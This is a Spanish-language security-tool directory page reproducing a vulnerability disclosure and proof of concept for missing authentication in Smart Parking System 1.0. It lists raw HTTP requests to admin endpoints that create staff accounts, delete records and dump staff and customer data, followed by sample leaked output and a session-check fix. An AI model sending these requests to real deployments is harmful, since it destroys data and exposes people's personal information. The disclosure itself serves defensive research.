Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-10243-AUTH — Prueba de concepto que demuestra acceso no autenticado a funciones administrativas críticas en Smart Parking System 1.0, permitiendo la creación de cuentas, la manipulación de datos y la exposición de información personal identificable (PII). | Kitploit
Herramientas/GitHubGitHub/xmyronn/cve-2026-10243-auth
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAutenticación
GitHubxmyronn/cve-2026-10243-auth

CVE-2026-10243-AUTH

Prueba de concepto que demuestra acceso no autenticado a funciones administrativas críticas en Smart Parking System 1.0, permitiendo la creación de cuentas, la manipulación de datos y la exposición de información personal identificable (PII).

Ver Repositorio
hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Smart Parking System 1.0 - Acceso no autenticado a funciones críticas de administración

Información de la vulnerabilidad

CampoDetalles
ProductoSmart Parking System
Vendedorcode-projects.org
Versión1.0
Clase de vulnerabilidadAutenticación faltante para función crítica (CWE-306)
ID CVEPendiente
Puntuación CVSS9.8 Crítico (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Autenticación requeridaNinguna
Archivos afectadosattendant.php, edit.php, basic_table.php, basic_table2.php, admin_request.php

Descripción

El Smart Parking System 1.0 de code-projects.org no aplica autenticación en múltiples endpoints exclusivos de administración. Un atacante remoto no autenticado puede acceder directamente a estos endpoints sin cookie de sesión y realizar operaciones privilegiadas, incluyendo la creación de cuentas de personal, la edición y eliminación de registros de estacionamiento, y la visualización de todos los datos personales de clientes y datos de reservas.

No se requieren credenciales, ni token de sesión, ni interacción de ningún usuario legítimo para explotar esta vulnerabilidad.


Resumen de la cadena de ataque

root@kitploit:~
Sin credenciales / sin sesión
        ↓
Solicitud GET directa a endpoints de administración
        ↓
attendant.php     → crear cuentas de personal fraudulentas
edit.php          → leer y sobrescribir cualquier registro de estacionamiento
basic_table.php   → eliminar cualquier registro de estacionamiento
basic_table2.php  → volcar todos los datos personales del personal
admin_request.php → volcar todos los correos de clientes y datos de reservas
        ↓
Funcionalidad completa de administración comprometida

Prueba de concepto paso a paso

Paso 1 — Confirmar el estado no autenticado

Abra una sesión de navegador nueva sin cookies. Navegue a la raíz de la aplicación. Se presenta la página de inicio de sesión, lo que confirma que no existe ninguna sesión activa:

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE/ HTTP/1.1
Host: 192.168.0.9

Paso 2 — Acceder al panel de creación de personal (sin autenticación)

Navegue directamente al endpoint de registro de personal:

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE/attendant.php HTTP/1.1
Host: 192.168.0.9

Resultado: Se carga el formulario completo "Add Parking Attendant Details" con campos para nombre, apellido, número de móvil, calle, nombre de usuario y contraseña. Un atacante puede registrar una cuenta de personal fraudulenta con acceso al sistema.


Paso 3 — Leer y modificar registros de estacionamiento (sin autenticación)

Navegue directamente al endpoint de edición de registros de estacionamiento:

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE//edit.php?edit=5 HTTP/1.1
Host: 192.168.0.9

Resultado: Se carga el formulario "Update Parkings Details" prellenado con valores en vivo de la base de datos:

root@kitploit:~
City:   Mombasa
Street: Tudor
Slots:  150
Cost:   500

Un atacante puede sobrescribir cualquier campo y enviarlo para persistir los cambios directamente en la base de datos.


Paso 4 — Eliminar registro de estacionamiento (sin autenticación)

Envíe una solicitud GET directa al endpoint de eliminación:

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE/basic_table.php?delete=4 HTTP/1.1
Host: 192.168.0.9

Resultado: La aplicación responde con:

root@kitploit:~
Parking deleted successfully

El registro se destruye permanentemente en la base de datos. No se requiere autenticación, ni token CSRF, ni mensaje de confirmación.


Paso 5 — Volcar todos los datos del personal de estacionamiento (sin autenticación)

Navegue directamente al endpoint de listado de personal:

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE//basic_table2.php HTTP/1.1
Host: 192.168.0.9

Resultado: Se devuelve el registro completo del personal, incluidos nombres, números de móvil y calles asignadas:

root@kitploit:~
karis  kelvin  070824555  msa
king   doshi   0708009360 Nairobi
james  peter   0708009360 vol
tset   test    0708009360 tset

Paso 6 — Volcar todos los datos de reservas de clientes (sin autenticación)

Navegue directamente al endpoint de solicitudes de reservas de administración:

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE//admin_request.php HTTP/1.1
Host: 192.168.0.9

Resultado: Se devuelven todos los registros de reservas de clientes, incluidos correos electrónicos, plazas, horas y costes:

root@kitploit:~
[email protected]   slots:4  hours:2  cost:4000  status:requested
[email protected]   slots:1  hours:6  cost:1200  status:Completed
[email protected]    slots:1  hours:2  cost:1000  status:requested
[email protected]       slots:1  hours:1  cost:500   status:requested
[email protected]        slots:1  hours:1  cost:500   status:requested
[email protected]    slots:1  hours:1  cost:500   status:requested
[email protected]    slots:1  hours:3  cost:0     status:requested
[email protected]       slots:1  hours:2  cost:1000  status:requested

Impacto

  • Acceso completo al panel de administración — toda la funcionalidad privilegiada es accesible sin credenciales
  • Destrucción de datos — cualquier registro de estacionamiento puede eliminarse permanentemente
  • Manipulación de datos — cualquier registro de estacionamiento puede modificarse
  • Escalada de privilegios — se pueden crear cuentas de personal fraudulentas con acceso al sistema
  • Exposición de datos personales — se recopilan todos los correos electrónicos de clientes y el historial de reservas
  • Fuga de datos del personal — se expone el registro completo, incluidos nombres y números de teléfono

Resumen de archivos afectados

ArchivoVulnerabilidad
attendant.phpCreación de cuentas de personal sin autenticación
edit.phpAcceso de lectura/escritura sin autenticación a registros de estacionamiento
basic_table.phpEliminación de registros de estacionamiento sin autenticación
basic_table2.phpAcceso sin autenticación a todos los datos personales del personal
admin_request.phpAcceso sin autenticación a todos los datos de reservas de clientes

Remediación

Añada una comprobación de autenticación de sesión al inicio de cada archivo PHP orientado a administración:

root@kitploit:~
session_start();
if (!isset($_SESSION['admin']) || $_SESSION['admin'] !== true) {
    header("Location: index.php");
    exit();
}

Referencias

  • Página principal del vendedor
  • CWE-306: Autenticación faltante para función crítica
  • OWASP: Control de acceso roto

Descubridor

  • Investigador: Imad Alvi
Descargar herramienta